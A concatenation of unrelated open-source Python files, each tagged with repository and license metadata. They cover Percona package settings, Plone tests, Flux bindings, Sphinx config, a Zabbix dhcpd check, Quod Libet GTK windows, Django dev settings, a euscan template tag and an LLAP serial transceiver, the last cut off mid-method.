pxc_executables = pxc57_executables
pxc_plugins = pxc57_plugins
pxc_functions = pxc57_functions
pxc_files = pxc57_files
pxc_symlinks = pxc57_symlinks
elif pxc_version_major == '5.6':
pxc_binaries = pxc56_binaries
pxc_executables = pxc56_executables
pxc_plugins = pxc56_plugins
pxc_functions = pxc56_functions
pxc_files = pxc56_files
pxc_symlinks = pxc56_symlinks
|
Percona-QA/package-testing
|
binary-tarball-tests/pxc/settings.py
|
Python
|
gpl-2.0
| 9,953
|
import unittest
#from zope.testing import doctestunit
#from zope.component import testing
from Testing import ZopeTestCase as ztc
from Products.Five import fiveconfigure
from Products.PloneTestCase import PloneTestCase as ptc
from Products.PloneTestCase.layer import PloneSite
ptc.setupPloneSite()
import uwosh.itdocs
class TestCase(ptc.PloneTestCase):
class layer(PloneSite):
@classmethod
def setUp(cls):
fiveconfigure.debug_mode = True
ztc.installPackage(uwosh.itdocs)
fiveconfigure.debug_mode = False
@classmethod
def tearDown(cls):
pass
def test_suite():
return unittest.TestSuite([
# Unit tests
#doctestunit.DocFileSuite(
# 'README.txt', package='uwosh.itdocs',
# setUp=testing.setUp, tearDown=testing.tearDown),
#doctestunit.DocTestSuite(
# module='uwosh.itdocs.mymodule',
# setUp=testing.setUp, tearDown=testing.tearDown),
# Integration tests that use PloneTestCase
#ztc.ZopeDocFileSuite(
# 'README.txt', package='uwosh.itdocs',
# test_class=TestCase),
#ztc.FunctionalDocFileSuite(
# 'browser.txt', package='uwosh.itdocs',
# test_class=TestCase),
])
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
uwosh/uwosh.itpeoplesoftdocs
|
uwosh/itdocs/tests.py
|
Python
|
gpl-2.0
| 1,377
|
from flux.wrapper import Wrapper
from flux._jsc import ffi, lib
# Constants taken from jstatctl.h
JSC_STATE_PAIR = "state-pair"
JSC_STATE_PAIR_OSTATE = "ostate"
JSC_STATE_PAIR_NSTATE = "nstate"
JSC_RDESC = "rdesc"
JSC_RDESC_NNODES = "nnodes"
JSC_RDESC_NTASKS = "ntasks"
JSC_RDESC_WALLTIME = "walltime"
JSC_RDL = "rdl"
JSC_RDL_ALLOC = "rdl_alloc"
JSC_RDL_ALLOC_CONTAINED = "contained"
JSC_RDL_ALLOC_CONTAINING_RANK = "cmbdrank"
JSC_RDL_ALLOC_CONTAINED_NCORES = "cmbdncores"
JSC_PDESC = "pdesc"
JSC_PDESC_SIZE = "procsize"
JSC_PDESC_HOSTNAMES = "hostnames"
JSC_PDESC_EXECS = "executables"
JSC_PDESC_PDARRAY = "pdarray"
JSC_PDESC_RANK_PDARRAY_PID = "pid"
JSC_PDESC_RANK_PDARRAY_HINDX = "hindx"
JSC_PDESC_RANK_PDARRAY_EINDX = "eindx"
class JSCWrapper(Wrapper):
"""
Generic JSC wrapper
"""
def __init__(self):
"""Set up the wrapper interface for functions prefixed with jsc_"""
super(JSCWrapper, self).__init__(ffi,
lib,
prefixes=[
'jsc_',
])
RAW = JSCWrapper()
def query_jcb(flux_handle, jobid, key):
jcb_str = ffi.new('char *[1]')
RAW.query_jcb(flux_handle, jobid, key, jcb_str)
if jcb_str[0] == ffi.NULL:
return None
else:
return ffi.string(jcb_str[0])
def update_jcb(flux_handle, jobid, key, jcb):
return RAW.jsc_update_jcb(flux_handle, jobid, key, jcb)
@ffi.callback('jsc_handler_f')
def jsc_notify_wrapper(jcb, arg, errnum):
if jcb != ffi.NULL:
jcb = ffi.string(jcb)
callback, real_arg = ffi.from_handle(arg)
ret = callback(jcb, real_arg, errnum)
return ret if ret is not None else 0
HANDLES = []
def notify_status(flux_handle, fun, arg):
warg = (fun, arg)
whandle = ffi.new_handle(warg)
HANDLES.append(whandle)
return RAW.notify_status(flux_handle, jsc_notify_wrapper, whandle)
def job_num2state(job_state):
ret = RAW.job_num2state(job_state)
if ret == ffi.NULL:
return None
else:
return ffi.string(ret)
|
lipari/flux-core
|
src/bindings/python/flux/jsc.py
|
Python
|
gpl-2.0
| 2,126
|
# -*- coding: utf-8 -*-
#
# ASE documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 20 09:39:26 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
sys.path.append('.')
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['ext',
'images',
'sphinx.ext.autodoc',
'sphinx.ext.pngmath',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'ASE'
copyright = '2014, CAMd'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
try:
from ase.version import version
except ImportError:
version = '3.0.0'
# The full version, including alpha/beta/rc tags.
release = version
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
default_role = 'math'#None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
autoclass_content = 'both'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'ase.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
html_logo = '_static/ase.ico'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/ase.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = '.html'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ASEdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
latex_paper_size = 'a4'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
latex_documents = [
('contents', 'ase-manual.tex', 'ASE Manual', 'CAMd', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
latex_preamble = '\usepackage{amsmath}'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to gpaw.
intersphinx_mapping = {'gpaw': ('http://wiki.fysik.dtu.dk/gpaw', None),
'python': ('http://docs.python.org/2.7', None)}
# sphinx.ext.pngmath manual configuration
# ---------------------------------------
pngmath_latex_preamble = '\usepackage{amsmath}\usepackage{amsfonts}\usepackage[active]{preview}'
# Additional arguments to give to dvipng, as a list.
# The default value is ['-gamma 1.5', '-D 110']
pngmath_dvipng_args = [
'-bgTransparent',
'-Ttight',
'--noghostscript',
'-l10',
'--depth',
'-D 136',
]
# correctly aligns the baselines
pngmath_use_preview = True
|
PHOTOX/fuase
|
ase/doc/conf.py
|
Python
|
gpl-2.0
| 6,646
|
import csv
from check import Check, CheckFail, MetricType, Metric
from lib.cache import Cache
from lib.utils import run_command, transpose_dict
class Dhcpd(Check):
name = "dhcpd"
first_ip = None
tmpfile = None
def _init_metrics(self):
self.metrics = {
"netname": Metric(MetricType.String, key="shared net name"),
"first_ip": Metric(MetricType.String, key="first ip"),
"last_ip": Metric(MetricType.String, key="last ip"),
"pool_size": Metric(MetricType.Integer, key="max"),
"active_leases": Metric(MetricType.Integer, key="cur"),
"pool_usage": Metric(MetricType.Float, key="percent"),
"expired_leases": Metric(MetricType.Integer, key="touch"),
"failover_pool_size": Metric(MetricType.Integer, key="bu"),
"failover_pool_percent": Metric(MetricType.Float, key="bu perc"),
"discovery": Metric(MetricType.Discovery, self._discovery),
}
def _get(self, metric=None, *args, **kwargs):
self.first_ip = kwargs.get("firstip", None)
self._load_data()
return self._get_value(self.metrics[metric])
def _get_value(self, metric):
if metric.type == MetricType.Discovery:
metric.callback()
return self._correct_type(metric.type, self.test_data)
key = metric.kwargs.get("key")
if self.first_ip is None:
raise CheckFail("Required parameter 'firstip' missing.")
if self.first_ip not in self.test_data:
raise CheckFail("Specified first ip (%s) not found in data" % self.first_ip)
return self._correct_type(metric.type, self.test_data[self.first_ip][key])
def _load_data(self):
self.test_data = Cache.read(self.name)
if self.test_data is not None:
return
self._refresh_stats()
self._parse_stats()
Cache.write(self.name, self.test_data)
def _refresh_stats(self):
self.tmpfile = "/tmp/zems-dhcpd-unparsed"
command = "%s -c %s -l %s -f c -o %s" % (self.config.get("dhcpd_pools_command", "/usr/bin/dhcpd-pools"),
self.config.get("dhcpd_config_file", "/etc/dhcpd/dhcpd.conf"),
self.config.get("dhcpd_leases_file", "/var/lib/dhcpd/dhcpd.leases"),
self.tmpfile)
run_command(command)
def _parse_stats(self):
fieldnames = (
"shared net name", "first ip", "last ip", "max", "cur", "percent", "touch", "t+c", "t+c perc", "bu",
"bu perc")
data = []
with open(self.tmpfile, "r") as f:
reader = csv.DictReader(f, fieldnames=fieldnames)
# Skip the first two lines (as they are useless headers)
reader.next()
reader.next()
for row in reader:
# We only need the first section, dump the rest
if ":" in row["shared net name"]:
break
data.append(row)
self.test_data = transpose_dict(data, "first ip")
def _discovery(self):
data = [{"{#FIRSTIP}": item[0], "{#LASTIP}": item[1]["last ip"]}
for item in self.test_data.iteritems()]
self.test_data = data
|
marijngiesen/zabbix-ems
|
zems/dhcpd.py
|
Python
|
gpl-2.0
| 3,353
|
# Copyright 2012,2014 Christoph Reiter
# 2014,2017 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import sys
import os
from typing import List
from gi.repository import Gtk, Gdk
from quodlibet import config
from quodlibet.qltk import get_top_parent, is_wayland, gtk_version, is_accel
from quodlibet.qltk.x import Button
from quodlibet.util import DeferredSignal, print_d, print_w
from quodlibet.util import connect_obj, connect_destroy
def on_first_map(window, callback, *args, **kwargs):
"""Calls callback when the passed Gtk.Window is first visible
on screen or it already is.
"""
assert isinstance(window, Gtk.Window)
if window.get_mapped():
callback(*args, **kwargs)
return False
id_ = [0]
def on_map(*otherargs):
window.disconnect(id_[0])
callback(*args, **kwargs)
id_[0] = window.connect("map", on_map)
return False
def should_use_header_bar():
settings = Gtk.Settings.get_default()
if not settings:
return False
if not hasattr(settings.props, "gtk_dialogs_use_header"):
return False
return settings.get_property("gtk-dialogs-use-header")
def fix_default_size(width, height):
# https://bugzilla.gnome.org/show_bug.cgi?id=740922
if gtk_version < (3, 19):
# fixed with 3.20:
# https://bugzilla.gnome.org/show_bug.cgi?id=756618
if width != -1:
width += min((width - 174), 56)
if height != -1:
height += 84
return (width, height)
class Dialog(Gtk.Dialog):
"""A Gtk.Dialog subclass which supports the use_header_bar property
for all Gtk versions and will ignore it if header bars shouldn't be
used according to GtkSettings.
"""
def __init__(self, *args, **kwargs):
if not should_use_header_bar():
kwargs.pop("use_header_bar", None)
super(Dialog, self).__init__(*args, **kwargs)
def get_titlebar(self):
try:
# gtk+ >=3.16
return super(Dialog, self).get_titlebar()
except AttributeError:
return None
def set_default_size(self, width, height):
if self.get_titlebar():
width, height = fix_default_size(width, height)
else:
# In case we don't use a headerbar we have to add an additional
# row of buttons in the content box. To get roughly the same
# content height make the window a bit taller.
if height != -1:
height += 20
super(Dialog, self).set_default_size(width, height)
def add_icon_button(self, label, icon_name, response_id):
"""Like add_button() but allows to pass an icon name"""
button = Button(label, icon_name)
# file chooser uses grab_default() on this
button.set_can_default(True)
button.show()
self.add_action_widget(button, response_id)
return button
class Window(Gtk.Window):
"""Base window class the keeps track of all window instances.
All active instances can be accessed through Window.windows.
By defining dialog=True as a kwarg binds Escape to close, otherwise
^W will close the window.
"""
windows: List[Gtk.Window] = []
_preven_inital_show = False
def __init__(self, *args, **kwargs):
self._header_bar = None
dialog = kwargs.pop("dialog", True)
super(Window, self).__init__(*args, **kwargs)
type(self).windows.append(self)
if dialog:
# Modal is the only way to center the window on the parent
# with wayland atm
if is_wayland():
self.set_modal(True)
self.set_type_hint(Gdk.WindowTypeHint.DIALOG)
self.set_destroy_with_parent(True)
self.set_position(Gtk.WindowPosition.CENTER_ON_PARENT)
connect_obj(self, 'destroy', type(self).windows.remove, self)
self.connect('key-press-event', self._on_key_press)
def _on_key_press(self, widget, event):
is_dialog = (self.get_type_hint() == Gdk.WindowTypeHint.DIALOG)
if (is_dialog and is_accel(event, "Escape")) or (
not is_dialog and is_accel(event, "<Primary>w")):
# Do not close the window if we edit a Gtk.CellRendererText.
# Focus the treeview instead.
if isinstance(self.get_focus(), Gtk.Entry) and \
isinstance(self.get_focus().get_parent(), Gtk.TreeView):
self.get_focus().get_parent().grab_focus()
return Gdk.EVENT_PROPAGATE
self.close()
return Gdk.EVENT_STOP
if not is_dialog and is_accel(event, "F11"):
self.toggle_fullscreen()
return Gdk.EVENT_STOP
return Gdk.EVENT_PROPAGATE
def toggle_fullscreen(self):
"""Toggle the fullscreen mode of the window depending on its current
state. If the windows isn't realized it will switch to fullscreen
when it does.
"""
window = self.get_window()
if not window:
is_fullscreen = False
else:
is_fullscreen = window.get_state() & Gdk.WindowState.FULLSCREEN
if is_fullscreen:
self.unfullscreen()
else:
self.fullscreen()
def set_default_size(self, width, height):
if self._header_bar:
width, height = fix_default_size(width, height)
super(Window, self).set_default_size(width, height)
def use_header_bar(self):
"""Try to use a headerbar, returns the widget or None in case
GTK+ is too old or headerbars are disabled (under xfce for example)
"""
assert not self._header_bar
if not should_use_header_bar():
return False
header_bar = Gtk.HeaderBar()
header_bar.set_show_close_button(True)
header_bar.show()
old_title = self.get_title()
self.set_titlebar(header_bar)
if old_title is not None:
self.set_title(old_title)
self._header_bar = header_bar
self.set_default_size(*self.get_default_size())
return header_bar
def has_close_button(self):
"""Returns True in case we are sure that the window decorations include
a close button.
"""
if self.get_type_hint() == Gdk.WindowTypeHint.NORMAL:
return True
if os.name == "nt":
return True
if sys.platform == "darwin":
return True
if self._header_bar is not None:
return self._header_bar.get_show_close_button()
screen = Gdk.Screen.get_default()
if hasattr(screen, "get_window_manager_name"):
# X11 only
wm_name = screen.get_window_manager_name()
# Older Gnome Shell didn't show close buttons.
# We can't get the version but the GTK+ version is a good guess,
# I guess..
if wm_name == "GNOME Shell" and gtk_version < (3, 18):
return False
return True
def present(self):
"""A version of present that also works if not called from an event
handler (there is no active input event).
See https://bugzilla.gnome.org/show_bug.cgi?id=688830
"""
try:
from gi.repository import GdkX11
except ImportError:
super(Window, self).present()
else:
window = self.get_window()
if window and isinstance(window, GdkX11.X11Window):
timestamp = GdkX11.x11_get_server_time(window)
self.present_with_time(timestamp)
else:
super(Window, self).present()
def set_transient_for(self, parent):
"""Set a parent for the window.
In case parent=None, fall back to the main window.
"""
is_toplevel = parent and parent.props.type == Gtk.WindowType.TOPLEVEL
if parent is None or not is_toplevel:
if parent:
print_w("Not a toplevel window set for: %r" % self)
from quodlibet import app
parent = app.window
super(Window, self).set_transient_for(parent)
@classmethod
def prevent_inital_show(cls, value):
cls._preven_inital_show = bool(value)
def show_maybe(self):
"""Show the window, except if prevent_inital_show() was called and
this is the first time.
Returns whether the window was shown.
"""
if not self._preven_inital_show:
self.show()
return not self._preven_inital_show
class PersistentWindowMixin(object):
"""A mixin for saving/restoring window size/position/maximized state"""
def enable_window_tracking(self, config_prefix, size_suffix=""):
"""Enable tracking/saving of changes and restore size/pos/maximized.
Make sure to call set_transient_for() before since position is
restored relative to the parent in this case.
config_prefix -- prefix for the config key
(prefix_size, prefix_position, prefix_maximized)
size_suffix -- optional suffix for saving the size. For cases where the
window has multiple states with different content sizes.
(example: edit tags with one song or multiple)
"""
self.__state = 0
self.__name = config_prefix
self.__size_suffix = size_suffix
self.__save_size_pos_deferred = DeferredSignal(
self.__do_save_size_pos, timeout=50, owner=self)
self.connect('configure-event', self.__configure_event)
self.connect('window-state-event', self.__window_state_changed)
self.connect('notify::visible', self.__visible_changed)
parent = self.get_transient_for()
if parent:
connect_destroy(
parent, 'configure-event', self.__parent_configure_event)
self.__restore_window_state()
def __visible_changed(self, *args):
if not self.get_visible():
# https://bugzilla.gnome.org/show_bug.cgi?id=731287
# if we restore after hide, mutter will remember for the next show
# hurray!
self.__restore_window_state()
def __restore_window_state(self):
if not is_wayland():
self.__restore_state()
self.__restore_position()
self.__restore_size()
def __conf(self, name):
if name == "size":
name += "_" + self.__size_suffix
return "%s_%s" % (self.__name, name)
def __restore_state(self):
print_d("Restore state")
if config.getint("memory", self.__conf("maximized"), 0):
self.maximize()
else:
self.unmaximize()
def __restore_position(self):
print_d("Restore position")
pos = config.get('memory', self.__conf("position"), "")
if not pos:
return
try:
x, y = map(int, pos.split())
except ValueError:
return
parent = self.get_transient_for()
if parent:
px, py = parent.get_position()
x += px
y += py
self.move(x, y)
def __restore_size(self):
print_d("Restore size")
value = config.get('memory', self.__conf("size"), "")
if not value:
return
try:
x, y = map(int, value.split())
except ValueError:
return
screen = self.get_screen()
x = min(x, screen.get_width())
y = min(y, screen.get_height())
if x >= 1 and y >= 1:
self.resize(x, y)
def __parent_configure_event(self, window, event):
# since our position is relative to the parent if we have one,
# we also need to save our position if the parent position changes
self.__do_save_pos()
return False
def __configure_event(self, window, event):
# xfwm4 resized the window before it maximizes it, which leads
# to QL remembering the wrong size. Work around that by waiting
# until configure-event settles down, at which point the maximized
# state should be set
self.__save_size_pos_deferred()
return False
def _should_ignore_state(self):
if self.__state & Gdk.WindowState.MAXIMIZED:
return True
elif self.__state & Gdk.WindowState.FULLSCREEN:
return True
elif not self.get_visible():
return True
return False
def __do_save_size_pos(self):
if self._should_ignore_state():
return
width, height = self.get_size()
value = "%d %d" % (width, height)
config.set("memory", self.__conf("size"), value)
self.__do_save_pos()
def __do_save_pos(self):
if self._should_ignore_state():
return
x, y = self.get_position()
parent = self.get_transient_for()
if parent:
px, py = parent.get_position()
x -= px
y -= py
pos_value = '%s %s' % (x, y)
config.set('memory', self.__conf("position"), pos_value)
def __window_state_changed(self, window, event):
self.__state = event.new_window_state
if self.__state & Gdk.WindowState.WITHDRAWN:
return
maximized = int(self.__state & Gdk.WindowState.MAXIMIZED)
config.set("memory", self.__conf("maximized"), maximized)
class _Unique(object):
"""A mixin for window-like classes to ensure one instance per class. """
__window = None
def __new__(klass, *args, **kwargs):
window = klass.__window
if window is None:
return super(_Unique, klass).__new__(klass, *args, **kwargs)
# Look for widgets in the args, if there is one and it has
# a new top level window, re-parent and reposition the window.
widgets = [w for w in args if isinstance(w, Gtk.Widget)]
if widgets:
parent = window.get_transient_for()
new_parent = get_top_parent(widgets[0])
if parent and new_parent and parent is not new_parent:
window.set_transient_for(new_parent)
window.hide()
window.show()
window.present()
return window
@classmethod
def is_not_unique(klass):
"""Returns True if a window instance already exists."""
return bool(klass.__window)
def __init__(self, *args, **kwargs):
if type(self).__window:
return
else:
type(self).__window = self
super(_Unique, self).__init__(*args, **kwargs)
connect_obj(self, 'destroy', self.__destroy, self)
def __destroy(self, *args):
type(self).__window = None
class UniqueWindow(_Unique, Window):
pass
|
ptitjes/quodlibet
|
quodlibet/qltk/window.py
|
Python
|
gpl-2.0
| 15,094
|
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# ETC_DIR = os.path.join(BASE_DIR.ancestor(1), 'etc')
APP_NAME = 'edc_base'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dv$eox1uch^ru@&(buh(d%h+(t6y^s==zdk$&07##)ll^*2%fi'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SITE_ID = 10
REVIEWER_SITE_ID = 0
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django_crypto_fields.apps.AppConfig',
'django_revision.apps.AppConfig',
'django_js_reverse',
'edc_device.apps.AppConfig',
'edc_protocol.apps.AppConfig',
'edc_base.apps.AppConfig',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'edc_base.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'edc_base.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
GIT_DIR = BASE_DIR
KEY_PATH = os.path.join(BASE_DIR, 'crypto_fields')
if 'test' in sys.argv:
class DisableMigrations:
def __contains__(self, item):
return True
def __getitem__(self, item):
return None
MIGRATION_MODULES = DisableMigrations()
PASSWORD_HASHERS = ('django.contrib.auth.hashers.MD5PasswordHasher', )
DEFAULT_FILE_STORAGE = 'inmemorystorage.InMemoryStorage'
|
botswana-harvard/edc-base
|
edc_base/settings.py
|
Python
|
gpl-2.0
| 3,643
|
"""
The :mod:`mappers` module is data access objects for database.
"""
|
hzxie/Sharp-V
|
mappers/__init__.py
|
Python
|
gpl-2.0
| 71
|
from django import template
from django.core.urlresolvers import reverse
register = template.Library()
@register.inclusion_tag('euscan/_favourite.html', takes_context=True)
def favourite_buttons(context, subj, *args):
context["favourite_url"] = reverse("favourite_%s" % subj, args=args)
context["unfavourite_url"] = reverse("unfavourite_%s" % subj, args=args)
return context
|
iksaif/euscan
|
euscanwww/euscan_accounts/templatetags/euscan_accounts_helpers.py
|
Python
|
gpl-2.0
| 390
|
"""Main LLAP classes: Packet, Transceiver, Device."""
import time
import serial
import threading
LLAP_PACKET_LENGTH = 12
LLAP_PACKET_HEADER = 'a'
LLAP_PACKET_PADDING = '-'
LLAP_ACK_DELAY = 0.5
class Packet(object):
"""LLAP packet."""
def __init__(self, addr=None, data=None):
"""Create LLAP packet object."""
self._data = []
self.clear()
if addr is not None:
self.add(LLAP_PACKET_HEADER)
self.add(addr)
if data is not None:
if len(data) > LLAP_PACKET_LENGTH - 3:
raise Exception('Packet data too long!')
self.add(data)
self.pad()
def clear(self):
"""Clear the packet data."""
self._data = []
def add(self, data):
"""Add data to the packet."""
self._data.extend(list(data))
def pad(self):
"""Pad the packet to packet length."""
self._data.extend([LLAP_PACKET_PADDING] * (LLAP_PACKET_LENGTH -
len(self._data)))
def unpad(self):
"""Remove padding from the end of the packet data."""
while self._data[-1] == LLAP_PACKET_PADDING:
del self._data[-1]
@property
def data(self):
"""Return packet data as string."""
return ''.join(self._data)
def is_valid(self):
"""Return true if packet is valid."""
if len(self._data) < LLAP_PACKET_LENGTH:
return False
if self._data[0] != LLAP_PACKET_HEADER:
return False
return True
@property
def address(self):
"""Return packet address as string."""
return ''.join(self._data[1:3])
@property
def message(self):
"""Return packet message as string."""
return ''.join(self._data[3:])
class Transceiver(object):
"""LLAP serial transceiver."""
def __init__(self, port, baudrate, handler=None, debug=False):
"""Create LLAP Transceiver."""
self.handler = handler
self.debug = debug
self.packet = Packet()
self.last_char = 0
"""Maximum delay between characters - longer delay means new packet"""
self.max_delay = 0.05
self.devices = {}
self.serial = serial.Serial(port, baudrate)
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.daemon = True
time.sleep(0.05) # wait for the serial port to settle
self.start()
def reader(self):
"""Reader thread."""
try:
while True:
char = self.serial.read(1)
now = time.time()
delay = now - self.last_char
self.last_char = now
# longer delay means new packet
if delay > self.max_delay:
self.packet.clear()
self.packet.add(char)
if self.packet.is_valid():
self.receive(self.packet)
self.packet.clear()
except serial.SerialException:
raise
def start(self):
"""Start the receiver thread"""
self.receiver_thread.start()
def send(self, addr, message):
"""Send a message to addr."""
self.send_packet(Packet(addr, message))
def send_packet(self, packet):
"""Send a packet."""
if self.debug:
t = time.time()
print "%s.%03d >> %s" % (time.strftime("%H:%M:%S"),
int(round(1000*(t - int(t)))),
packet.data)
self.serial.write(packet.data)
def receive(self, packet):
"""Packet receiver handler."""
if self.debug:
t = time.time()
print "%s.%03d << %s" % (time.strftime("%H:%M:%S"),
int(round(1000*(t - int(t)))),
packet.data)
self.packet.unpad()
addr = packet.address
message = packet.message
# call the device message handler if registered
if addr in self.devices:
self.devices[addr].receive(message)
# call user handler if registered
if self.handler is not None:
self.handler(addr, message)
def register_device(self, device):
"""Register device for receiver callbacks."""
self.devices[device.address] = device
def unregister_device(self, device):
"""Unregister device."""
if device.address in self.devices:
del self.devices[device.address]
class Device(object):
"""LLAP device base class."""
def __init__(self, addr, transceiver, message=None, debug=False):
""" Construct basic LLAP device."""
self._address = None
self.transceiver = transceiver
self.debug = debug
self.last_recd_message = ''
self.last_sent_time = 0
self._started = threading.Event()
self._received = threading.Event()
self._send_delay = 0
self.address = addr
if message is not None:
self.receive(message)
@property
def address(self):
"""Return device address."""
return self._address
@address.setter
def address(self, value):
"""Set the device address."""
self.transceiver.unregister_device(self)
self._address = value
self.transceiver.register_device(self)
@property
def started(self):
"""Return True if device has STARTED."""
return self._started.is_set()
@started.setter
def started(self, value):
"""Set the started flag."""
if value:
self._started.set()
else:
self._started.clear()
def last_sent_before(self):
"""Return the time in float seconds since the last message was sent."""
return time.time() - self.last_sent_time
def send(self, message, delay=None, wait=False, response=None,
timeout=1, retry=3):
"""Send message to the device, optionally waiting for the response."""
if response is not None:
wait = True
message_delay = self._send_delay - self.last_sent_before()
if message_delay > 0:
time.sleep(message_delay)
self._send_delay = 0
self._send_delay = delay if delay is not None else 0
for i in range(retry):
if self.debug:
print '>>D %s' % message
self._received.clear()
self.transceiver.send(self.address, message)
self.last_sent_time = time.time()
if not wait:
return
if self._received.wait(timeout):
if response is None or \
self.last_recd_message.startswith(response):
return self.last_recd_message
return None
def receive(self, message):
"""Receiver callback.
Called from Transceiver for every received packet to the device address
"""
if self.debug:
print '<<D %s' % message
self._handle_message(message)
self.last_recd_message = message
self._received.set()
def _handle_message(self, message):
"""Handler some messages automatically."""
if message == 'STARTED':
self.started = True
self.send('ACK', delay=LLAP_ACK_DELAY)
def wait_start(self, timeout=None):
"""Wait for the device to start."""
self._started.wait(timeout)
def apver(self, timeout=1, retry=3):
"""Return LLAP version."""
msg = 'APVER'
return self.send(msg, response=msg, timeout=timeout, retry=retry)
def batt(self, timeout=1, retry=3):
